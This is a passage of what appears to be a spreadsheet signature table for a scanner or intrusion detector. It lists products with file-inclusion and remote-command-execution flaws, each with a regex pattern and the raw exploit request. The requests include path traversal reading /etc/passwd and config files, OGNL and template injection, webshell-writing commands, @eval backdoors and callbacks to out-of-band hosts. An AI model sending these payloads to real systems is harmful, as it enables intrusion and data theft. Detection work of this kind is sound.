    <t>/default/en_US/frame.A100.html?sidebar=..%2f..%2f ..%2f..%2f..%2f..%2f..%2fetc%2fpasswd|/default/en_US/frame.html?content=..%2f..%2f..%2f ..%2f..%2f..%2f..%2fetc%2fpasswd|/default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd|/default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd</t>
  </si>
  <si>
    <t>Hanming Video Conferencing</t>
  </si>
  <si>
    <t>Hanming Video Conferencing_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/register/toDownload\.do\?fileName=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./windows/win\.ini|/register/toDownload\.do\?fileName=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini|/register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Hjtcloud_任意文件包含</t>
  </si>
  <si>
    <t>/fileDownload?action=downloadBackupFile|/him/api/rest/V1.0/system/log/list?filePath=../</t>
  </si>
  <si>
    <t>Interlib_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/interlib/report/ShowImage\?localPath=etc/passwd|/interlib/report/ShowImage\?localPath=C:\\Windows\\system\.ini).*</t>
  </si>
  <si>
    <t>Jinhe OAc FiledownlOAd</t>
  </si>
  <si>
    <t>Jinhe OAc FiledownlOAd_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/c6/JHSoft\.Web\.CustomQuery/FileDownLoad\.aspx\?FilePath=\.\./Resource/JHFileConfig\.ini).*</t>
  </si>
  <si>
    <t>/c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini</t>
  </si>
  <si>
    <t>Jolokia_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/jolokia/exec/com\.sun\.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd|/actuator/jolokia/exec/com\.sun\.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd).*</t>
  </si>
  <si>
    <t>/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd|/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd</t>
  </si>
  <si>
    <t>Joomla_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_jvehicles\&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_easyshop\&amp;task=ajax\.loadImage\&amp;file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA=).*</t>
  </si>
  <si>
    <t>Karenderia CMS</t>
  </si>
  <si>
    <t>Karenderia CMS_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/exportmanager/ajax/getfiles\?f=/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/exportmanager/ajax/getfiles?f=/../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Kingdee Apusic</t>
  </si>
  <si>
    <t>Kingdee Apusic_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/admin/protected/selector/server_file/files\?folder=/\&amp;suffix=|/admin/protected/selector/server_file/files\?folder=C://\&amp;suffix=).*</t>
  </si>
  <si>
    <t>/admin/protected/selector/server_file/files?folder=/&amp;suffix=|/admin/protected/selector/server_file/files?folder=C://&amp;suffix=</t>
  </si>
  <si>
    <t>Kingdee Cloud</t>
  </si>
  <si>
    <t>Kingdee Cloud_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/CommonFileServer/etc/passwd|/CommonFileServer/c:/Windows/win\.ini).*</t>
  </si>
  <si>
    <t>/CommonFileServer/etc/passwd|/CommonFileServer/c:/Windows/win.ini</t>
  </si>
  <si>
    <t>.*?(?:/eam/vib\?id=/etc/issue|/eam/vib\?id=/etc/passwd).*</t>
  </si>
  <si>
    <t>/eam/vib?id=/etc/issue|/eam/vib?id=/etc/passwd</t>
  </si>
  <si>
    <t>Lokomedia CMS</t>
  </si>
  <si>
    <t>Lokomedia CMS_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/downlot\.php\?file=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/downlot.php?file=../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Lotus Core CMS</t>
  </si>
  <si>
    <t>Lotus Core CMS_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?page_slug=\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?page_slug=../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>Lvs DownlOAd</t>
  </si>
  <si>
    <t>Lvs DownlOAd_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/Business/DownLoad\.aspx\?p=UploadFile/\.\./Web\.Config).*</t>
  </si>
  <si>
    <t>/Business/DownLoad.aspx?p=UploadFile/../Web.Config</t>
  </si>
  <si>
    <t>Magicflow</t>
  </si>
  <si>
    <t>Magicflow_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/msa/main\.xp\?Fun=msaDataCenetrDownLoadMore\+delflag=1\+downLoadFileName=msagroup\.txt\+downLoadFile=\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd|/msa/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd|/msa/../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Moodle Jmol Filter_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/filter/jmol/js/jsmol/php/jsmol\.php\?call=getRawDataFromDatabase\&amp;query=file:///etc/passwd).*</t>
  </si>
  <si>
    <t>Opensis</t>
  </si>
  <si>
    <t>Opensis_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/ajax\.php\?modname=misc/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\&amp;bypass=Transcripts\.php).*</t>
  </si>
  <si>
    <t>/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&amp;bypass=Transcripts.php</t>
  </si>
  <si>
    <t>Orbiteam Bscw Server</t>
  </si>
  <si>
    <t>Orbiteam Bscw Server_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/pub/bscw\.CGI/30\?op=theme\&amp;style_name=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/pub/bscw.CGI/30?op=theme&amp;style_name=../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Ov Online Administration</t>
  </si>
  <si>
    <t>Ov Online Administration_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/download\.php\?c_id=557\&amp;file=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\&amp;name=download\.txt).*</t>
  </si>
  <si>
    <t>/download.php?c_id=557&amp;file=../../../../../../../../../../../etc/passwd&amp;name=download.txt</t>
  </si>
  <si>
    <t>Phpmyadmin系统</t>
  </si>
  <si>
    <t>CVE-2018-12613</t>
  </si>
  <si>
    <t>Phpmyadmin系统_任意文件包含_CVE-2018-12613</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?target=db_sql\.php%253f/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Pmb_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/opac_css/getgif\.php\?chemin=\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\&amp;nomgif=tarik|/pmb/opac_css/getgif\.php\?chemin=\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\&amp;nomgif=tarik).*</t>
  </si>
  <si>
    <t>/opac_css/getgif.php?chemin=../../../../../../etc/passwd&amp;nomgif=tarik|/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&amp;nomgif=tarik</t>
  </si>
  <si>
    <t>若依 Management System</t>
  </si>
  <si>
    <t>若依 Management System_任意文件包含</t>
  </si>
  <si>
    <t>致远OA_任意文件包含</t>
  </si>
  <si>
    <t>Sharp Multifunction Printers</t>
  </si>
  <si>
    <t>Sharp Multifunction Printers_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/installed_emanual_down\.html\?path=/manual/\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/installed_emanual_down.html?path=/manual/../../../etc/passwd</t>
  </si>
  <si>
    <t>Symantec Messaging Gateway_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/brightmail/servlet/com\.ve\.kavachart\.servlet\.ChartStream\?sn=\.\./\.\./WEB\-INF/).*</t>
  </si>
  <si>
    <t>Thinkphp</t>
  </si>
  <si>
    <t>Thinkphp_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/\?lang=\.\./\.\./thinkphp/base|/\?lang=\.\./\.\./\.\./\.\./\.\./vendor/topthink/think\-trace/src/TraceDebug).*</t>
  </si>
  <si>
    <t>/?lang=../../thinkphp/base|/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug</t>
  </si>
  <si>
    <t>.*?(?:C:\\Documents\+and\+Settings\\All\+Users\\Application\+Data\\VMware\\VMware\+VirtualCenter|C:\\ProgramData\\VMware\\VMware\+VirtualCenter|C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware\-vpx|/eam/vib\?id=\{\{path\}\}\\vcdb\.properties).*</t>
  </si>
  <si>
    <t>C:\Documents+and+Settings\All+Users\Application+Data\VMware\VMware+VirtualCenter|C:\ProgramData\VMware\VMware+VirtualCenter|C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx|/eam/vib?id={{path}}\vcdb.properties</t>
  </si>
  <si>
    <t>.*?(?:/\?wpv\-image=\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2Fetc%2Fpasswd).*</t>
  </si>
  <si>
    <t>.*?(?:/wp\-content/plugins/adaptive\-images/adaptive\-images\-script\.php\?adaptive\-images\-settings\[source_file\]=\.\./\.\./\.\./wp\-config\.php).*</t>
  </si>
  <si>
    <t>/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php</t>
  </si>
  <si>
    <t>Wp Umbrella Plugin</t>
  </si>
  <si>
    <t>Wp Umbrella Plugin_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/\?umbrella\-restore=1\&amp;filename=\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/?umbrella-restore=1&amp;filename=../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>通达OA_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/ispirit/interface/gateway\.php\?json=\{%22url%22:%22/general/\.\./\.\./mysql5/my\.ini%22\}).*</t>
  </si>
  <si>
    <t>/ispirit/interface/gateway.php?json={%22url%22:%22/general/../../mysql5/my.ini%22}</t>
  </si>
  <si>
    <t>Amtt Hiboss系统</t>
  </si>
  <si>
    <t>Amtt Hiboss系统_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/*.*\|echo%20"&lt;\?php%20echo%20md5\(randomLowercase\(10\)\);unlink\(__FILE__\);\?&gt;"&gt;\.\./\.\./randomLowercase\(10\)\.php\&amp;id=1).*</t>
  </si>
  <si>
    <t>/*.*\|echo%20"&lt;?php%20echo%20md5(randomLowercase(10));unlink(__FILE__);?&gt;"&gt;../../randomLowercase(10).php&amp;id=1</t>
  </si>
  <si>
    <t>Avcon 在线教育系统</t>
  </si>
  <si>
    <t>Avcon 在线教育系统_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/login\.action\?redirect:\$\{%23a%3d\(new%20java\.lang\.ProcessBuilder\(new%20java\.lang\.String\[\]\{%22echo%22,%225KIR2N0VM1auBAbCgwzpkcjJnFZWX89r%22\}\)\)\.start\(\),%23b%3d%23a\.getInputStream\(\),%23c%3dnew%20java\.io\.InputStreamReader\(%23b\),%23d%3dnew%20java\.io\.BufferedReader\(%23c\),%23e%3dnew%20char\[50000\],%23d\.read\(%23e\),%23matt%3d%23context\.get\(%27com\.opensymphony\.xwork2\.dispatcher\.HttpServletResponse%27\),%23matt\.getWriter\(\)\.println\(%23e\),%23matt\.getWriter\(\)\.flush\(\),%23matt\.getWriter\(\)\.close\(\)\}).*</t>
  </si>
  <si>
    <t>/login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22echo%22,%225KIR2N0VM1auBAbCgwzpkcjJnFZWX89r%22})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}</t>
  </si>
  <si>
    <t>D Link Dsl 2888a系统</t>
  </si>
  <si>
    <t>D Link Dsl 2888a系统_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/CGI\-bin/execute_cmd\.CGI\?timestamp=1589333279490\&amp;cmd=id).*</t>
  </si>
  <si>
    <t>/page/login/login.html|/CGI-bin/execute_cmd.CGI?timestamp=1589333279490&amp;cmd=id</t>
  </si>
  <si>
    <t>织梦_远程命令执行_CVE-2018-7700</t>
  </si>
  <si>
    <t>.*?(?:/tag_test_action\.php\?url=a\&amp;token=\&amp;partcode=\{dede:field%20name=%27source%27%20runphp=%27yes%27\}echo%20md5randomInt\(2000000000,\ 2100000000\);\{/dede:field\}).*</t>
  </si>
  <si>
    <t>/tag_test_action.php?url=a&amp;token=&amp;partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5randomInt(2000000000, 2100000000);{/dede:field}</t>
  </si>
  <si>
    <t>Jeewms Dynamicdatasourcecontroller</t>
  </si>
  <si>
    <t>Jeewms Dynamicdatasourcecontroller_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/rest/\.\./dynamicDataSourceController\.do\?testConnection\&amp;driverClass=com\.mysql\.jdbc\.Driver\&amp;url=jdbc:mysql://\{\{interactsh\-url\}\}/test\?detectCustomCollations=true%26autoDeserialize=true\&amp;dbUser=test_user|//api/\.\.;/dynamicDataSourceController\.do\?testConnection\&amp;driverClass=com\.mysql\.jdbc\.Driver\&amp;url=jdbc:mysql://\{\{interactsh\-url\}\}/test\?detectCustomCollations=true%26autoDeserialize=true\&amp;dbUser=test_user).*</t>
  </si>
  <si>
    <t>/rest/../dynamicDataSourceController.do?testConnection&amp;driverClass=com.mysql.jdbc.Driver&amp;url=jdbc:mysql://{{interactsh-url}}/test?detectCustomCollations=true%26autoDeserialize=true&amp;dbUser=test_user|//api/..;/dynamicDataSourceController.do?testConnection&amp;driverClass=com.mysql.jdbc.Driver&amp;url=jdbc:mysql://{{interactsh-url}}/test?detectCustomCollations=true%26autoDeserialize=true&amp;dbUser=test_user|/api/../dynamicDataSourceController.do?testConnection&amp;driverClass=com.mysql.jdbc.Driver&amp;url=jdbc:mysql://{{interactsh-url}}/test?detectCustomCollations=true%26autoDeserialize=true&amp;dbUser=test_user</t>
  </si>
  <si>
    <t>Jenkins系统_远程命令执行_CVE-2018-1000861</t>
  </si>
  <si>
    <t>.*?(?:/securityRealm/user/admin/descriptorByName/org\.jenkinsci\.plugins\.workflow\.cps\.CpsFlowDefinition/checkScriptCompile\?value=@GrabConfig\(disableChecksums=true\)%0a@GrabResolver\(name=%27test%27,%20root=%27http://aaa%27\)%0a@Grab\(group=%27package%27,%20module=%27randomLowercase\(4\)%27,%20version=%271%27\)%0aimport%20Payload;).*</t>
  </si>
  <si>
    <t>/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27randomLowercase(4)%27,%20version=%271%27)%0aimport%20Payload;</t>
  </si>
  <si>
    <t>Nginxwebui</t>
  </si>
  <si>
    <t>Nginxwebui_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/AdminPage/conf/runCmd\?cmd=expr%20199812440%20\-%2010079%26%26echo%20nginx).*</t>
  </si>
  <si>
    <t>/AdminPage/conf/runCmd?cmd=expr%20199812440%20-%2010079%26%26echo%20nginx</t>
  </si>
  <si>
    <t>Seagate多媒体服务器Time Stamp参数</t>
  </si>
  <si>
    <t>Seagate多媒体服务器Time Stamp参数_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/getLogs\.psp\?time_stamp=%3becho%20\$\(\(456\*654\)\)).*</t>
  </si>
  <si>
    <t>/getLogs.psp?time_stamp=%3becho%20$((456*654))</t>
  </si>
  <si>
    <t>Tamronos Iptv/Vod</t>
  </si>
  <si>
    <t>Tamronos Iptv/Vod_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/api/ping\?count=5\&amp;host=;cat%20/etc/passwd;\&amp;port=80\&amp;source=1\.1\.1\.1\&amp;type=icmp|/api/ping\?count=5\&amp;host=;echo%20\{\{verify\}\};\&amp;port=80\&amp;source=1\.1\.1\.1\&amp;type=icmp).*</t>
  </si>
  <si>
    <t>/api/ping?count=5&amp;host=;cat%20/etc/passwd;&amp;port=80&amp;source=1.1.1.1&amp;type=icmp|/api/ping?count=5&amp;host=;echo%20{{verify}};&amp;port=80&amp;source=1.1.1.1&amp;type=icmp</t>
  </si>
  <si>
    <t>Thinkphp5控制器</t>
  </si>
  <si>
    <t>Thinkphp5控制器_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?s=/Index/\\think\\app/invokefunction\&amp;function=call_user_func_array\&amp;vars\[0\]=printf\&amp;vars\[1\]\[\]=a29hbHIgaXMg%25%25d2F0Y2hpbmcgeW91).*</t>
  </si>
  <si>
    <t>/index.php?s=/Index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=printf&amp;vars[1][]=a29hbHIgaXMg%25%25d2F0Y2hpbmcgeW91</t>
  </si>
  <si>
    <t>CVE-2021-21985</t>
  </si>
  <si>
    <t>Vmware_远程命令执行_CVE-2021-21985</t>
  </si>
  <si>
    <t>.*?(?:/ui/h5\-vsan/rest/proxy/service/com\.vmware\.vsan\.client\.services\.capability\.VsanCapabilityProvider/getClusterCapabilityData|/ui/h5\-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages|/ui/h5\-vsan/rest/proxy/service/systemProperties/getProperty).*</t>
  </si>
  <si>
    <t>/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData|/ui/h5-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages|/ui/h5-vsan/rest/proxy/service/systemProperties/getProperty</t>
  </si>
  <si>
    <t>CVE-2022-22954</t>
  </si>
  <si>
    <t>Vmware_远程命令执行_CVE-2022-22954</t>
  </si>
  <si>
    <t>.*?(?:/catalog\-portal/ui/oauth/verify\?error=\&amp;deviceUdid=%24%7b"freemarker%2etemplate%2eutility%2eExecute"%3fnew%28%29%28"id"%29%7d).*</t>
  </si>
  <si>
    <t>/catalog-portal/ui/oauth/verify?error=&amp;deviceUdid=%24%7b"freemarker%2etemplate%2eutility%2eExecute"%3fnew%28%29%28"id"%29%7d</t>
  </si>
  <si>
    <t>Wordpress_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/wp\-content/plugins/mailpress/mp\-includes/action\.php\?action=iview\&amp;id=\{\{id\}\}</t>
  </si>
  <si>
    <t>/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&amp;id={{id}}|/wp-content/plugins/mailpress/mp-includes/action.php</t>
  </si>
  <si>
    <t>YcCMS</t>
  </si>
  <si>
    <t>YcCMS_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/admin/\?a=Factory\(\);print\(randomInt\(800000000,\ 1000000000\)%2brandomInt\(800000000,\ 1000000000\)\);//\.\./).*</t>
  </si>
  <si>
    <t>/admin/?a=Factory();print(randomInt(800000000, 1000000000)%2brandomInt(800000000, 1000000000));//../</t>
  </si>
  <si>
    <t>Zeroshell系统</t>
  </si>
  <si>
    <t>Zeroshell系统_远程命令执行_CVE-2019-12725</t>
  </si>
  <si>
    <t>.*?(?:/CGI\-bin/kerbynet\?Action=x509view\&amp;Section=NoAuthREQ\&amp;User=\&amp;x509type=%27%0Aexpr%20randomInt\(800000000,\ 1000000000\)%20\-%20randomInt\(800000000,\ 1000000000\)%0A%27).*</t>
  </si>
  <si>
    <t>/CGI-bin/kerbynet?Action=x509view&amp;Section=NoAuthREQ&amp;User=&amp;x509type=%27%0Aexpr%20randomInt(800000000, 1000000000)%20-%20randomInt(800000000, 1000000000)%0A%27</t>
  </si>
  <si>
    <t>海康威视_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/svm/api/v1/productFile\?type=product\&amp;ip=127\.0\.0\.1\&amp;agentNo=1|/iac/iasService/v1/register).*</t>
  </si>
  <si>
    <t>/svm/api/v1/productFile?type=product&amp;ip=127.0.0.1&amp;agentNo=1|/iac/iasService/v1/register</t>
  </si>
  <si>
    <t>海洋CMS_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/data/mysqli_error_trace\.php\?_=printf\(md5\("randomLowercase\(8\)"\)\)%3B|/comment/api/index\.php\?gid=1\&amp;page=2\&amp;rlist\[\]=\*hex/@eval\(\$_GET\[_\]\)%3B%3F%3E).*</t>
  </si>
  <si>
    <t>/data/mysqli_error_trace.php?_=printf(md5("randomLowercase(8)"))%3B|/comment/api/index.php?gid=1&amp;page=2&amp;rlist[]=*hex/@eval($_GET[_])%3B%3F%3E</t>
  </si>
  <si>
    <t>酒店宽带管理系统</t>
  </si>
  <si>
    <t>酒店宽带管理系统_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/manager/radius/server_ping\.php\?ip=127\.0\.0\.1|cat\ /etc/passwd\ &gt;\.\./\.\./Test\.txt\&amp;id=1).*</t>
  </si>
  <si>
    <t>/manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd &gt;../../Test.txt&amp;id=1</t>
  </si>
  <si>
    <t>苹果CMS</t>
  </si>
  <si>
    <t>苹果CMS_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?m=vod\-search\&amp;wd=\{if\-A:printf\(md5\(randomInt\(800000000,\ 1000000000\)\)\)\}\{endif\-A\}).*</t>
  </si>
  <si>
    <t>/index.php?m=vod-search&amp;wd={if-A:printf(md5(randomInt(800000000, 1000000000)))}{endif-A}</t>
  </si>
  <si>
    <t>麒麟堡垒机</t>
  </si>
  <si>
    <t>麒麟堡垒机_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/get_luser_by_sshport\.php\?clientip=1;echo%20"&lt;\?php%20echo%20md5\(randomLowercase\(10\)\);unlink\(__FILE__\);\?&gt;"&gt;/opt/freesvr/web/htdocs/freesvr/audit/randomLowercase\(10\)\.php;\&amp;clientport=1</t>
  </si>
  <si>
    <t>/get_luser_by_sshport.php?clientip=1;echo%20"&lt;?php%20echo%20md5(randomLowercase(10));unlink(__FILE__);?&gt;"&gt;/opt/freesvr/web/htdocs/freesvr/audit/randomLowercase(10).php;&amp;clientport=1|/randomLowercase(10).php</t>
  </si>
  <si>
    <t>深信服_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/tool/log/c\.php\?strip_slashes=md5\&amp;host=randomLowercase\(8\)).*</t>
  </si>
  <si>
    <t>/tool/log/c.php?strip_slashes=md5&amp;host=randomLowercase(8)</t>
  </si>
  <si>
    <t>.*?(?:/tool/log/c\.php\?strip_slashes=printf\&amp;host=randomLowercase\(8\)%25%25randomLowercase\(8\)).*</t>
  </si>
  <si>
    <t>/tool/log/c.php?strip_slashes=printf&amp;host=randomLowercase(8)%25%25randomLowercase(8)</t>
  </si>
  <si>
    <t>腾龙Os Iptv系统</t>
  </si>
  <si>
    <t>腾龙Os Iptv系统_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/api/ping\?count=5\&amp;host=;echo%20\$\(expr%20randomInt\(800000000,\ 1000000000\)%20%2b%20randomInt\(800000000,\ 1000000000\)\):randomInt\(800000000,\ 1000000000\):randomInt\(800000000,\ 1000000000\);\&amp;port=80\&amp;source=1\.1\.1\.1\&amp;type=icmp).*</t>
  </si>
  <si>
    <t>/api/ping?count=5&amp;host=;echo%20$(expr%20randomInt(800000000, 1000000000)%20%2b%20randomInt(800000000, 1000000000)):randomInt(800000000, 1000000000):randomInt(800000000, 1000000000);&amp;port=80&amp;source=1.1.1.1&amp;type=icmp</t>
  </si>
  <si>
    <t>铁威马Tos系统</t>
  </si>
  <si>
    <t>铁威马Tos系统_远程命令执行_CVE-2020-28188</t>
  </si>
  <si>
    <t>.*?(?:/*.*\|echo%20"&lt;\?php%20echo%20md5\(randomLowercase\(10\)\);unlink\(__FILE__\);\?&gt;"%20&gt;&gt;%20/usr/www/randomLowercase\(10\)\.php%20\&amp;\&amp;%20chmod%20755%20/usr/www/randomLowercase\(10\)\.php).*</t>
  </si>
  <si>
    <t>/*.*\|echo%20"&lt;?php%20echo%20md5(randomLowercase(10));unlink(__FILE__);?&gt;"%20&gt;&gt;%20/usr/www/randomLowercase(10).php%20&amp;&amp;%20chmod%20755%20/usr/www/randomLowercase(10).php</t>
  </si>
  <si>
    <t>大华_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/config/asst/system_setPassWordValidate\.action/capture_handle\.action\?captureFlag=true\&amp;captureCommand=ping%20\{\{interactsh\-url\}\}%20index\.pcap).*</t>
  </si>
  <si>
    <t>.*?(?:/tool/log/c\.php\?strip_slashes=system\&amp;host=echo%20\{\{randstr\}\}).*</t>
  </si>
  <si>
    <t>/tool/log/c.php?strip_slashes=system&amp;host=echo%20{{randstr}}</t>
  </si>
  <si>
    <t>Qizhi</t>
  </si>
  <si>
    <t>Qizhi_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/audit/data_provider\.php\?ds_y=2019\&amp;ds_m=04\&amp;ds_d=02\&amp;ds_hour=09\&amp;ds_min=40\&amp;server_cond=\&amp;service=`id`\&amp;identity_cond=\&amp;query_type=all\&amp;format=json\&amp;browse=true).*</t>
  </si>
  <si>
    <t>/audit/data_provider.php?ds_y=2019&amp;ds_m=04&amp;ds_d=02&amp;ds_hour=09&amp;ds_min=40&amp;server_cond=&amp;service=`id`&amp;identity_cond=&amp;query_type=all&amp;format=json&amp;browse=true</t>
  </si>
  <si>
    <t>Avcon 系统管理平台</t>
  </si>
  <si>
    <t>Avcon 系统管理平台_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/login\.action\?redirect:\$\{%23a%3d\(new%20java\.lang\.ProcessBuilder\(new%20java\.lang\.String\[\]\{%22id%22\}\)\)\.start\(\),%23b%3d%23a\.getInputStream\(\),%23c%3dnew%20java\.io\.InputStreamReader\(%23b\),%23d%3dnew%20java\.io\.BufferedReader\(%23c\),%23e%3dnew%20char\[50000\],%23d\.read\(%23e\),%23matt%3d%23context\.get\(%27com\.opensymphony\.xwork2\.dispatcher\.HttpServletResponse%27\),%23matt\.getWriter\(\)\.println\(%23e\),%23matt\.getWriter\(\)\.flush\(\),%23matt\.getWriter\(\)\.close\(\)\}).*</t>
  </si>
  <si>
    <t>/login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22id%22})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}</t>
  </si>
  <si>
    <t>Geovision Ip Camera</t>
  </si>
  <si>
    <t>Geovision Ip Camera_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/PictureCatch\.CGI\?username=GEOVISION\&amp;password=%3Becho%20%2dn%204621d373cade4e83&gt;tmp%2ftestvul\.txt%3Becho%20%2dn%20alow&gt;&gt;tmp%2ftestvul\.txt\&amp;data_type=1\&amp;attachment=1\&amp;channel=1\&amp;secret=1\&amp;key=PWNED).*</t>
  </si>
  <si>
    <t>/PictureCatch.CGI?username=GEOVISION&amp;password=%3Becho%20%2dn%204621d373cade4e83&gt;tmp%2ftestvul.txt%3Becho%20%2dn%20alow&gt;&gt;tmp%2ftestvul.txt&amp;data_type=1&amp;attachment=1&amp;channel=1&amp;secret=1&amp;key=PWNED</t>
  </si>
  <si>
    <t>Netgear Dgn Devices</t>
  </si>
  <si>
    <t>Netgear Dgn Devices_远程命令执行</t>
  </si>
  <si>
